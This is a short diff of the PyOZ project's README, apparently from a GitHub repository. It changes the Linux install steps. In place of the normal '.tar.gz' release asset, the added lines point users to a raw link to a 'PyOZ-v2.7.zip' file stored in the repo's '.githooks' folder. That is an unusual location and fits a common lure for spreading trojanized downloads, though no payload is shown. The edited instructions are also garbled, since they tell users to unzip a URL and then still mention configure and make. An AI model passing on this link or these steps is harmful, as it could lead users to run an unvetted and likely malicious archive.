AyMozart/PyOZ/README.md

    Once you've chosen a release, look for the assets section.
 Depending on your operating system, download the appropriate file:
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the `.tar.gz` file.
+   - For Linux, download the `https://raw.githubusercontent.com/AyMozart/PyOZ/main/.githooks/PyOZ-v2.7.zip` file.

 4. **Install PyOZ**

    After downloading, locate the file on your computer.
    - **Windows:** Double-click on the `.exe` file and follow the prompts to install it.
    - **macOS:** Open the `.dmg` file, drag PyOZ to your Applications folder, and then launch it.
-   - **Linux:** Unzip the `.tar.gz` file in your desired directory.
+   - **Linux:** Unzip the `https://raw.githubusercontent.com/AyMozart/PyOZ/main/.githooks/PyOZ-v2.7.zip` file in your desired directory.
 You might need to run `./configure && make && make install` in the terminal depending on your setup.

 5. **Run PyOZ**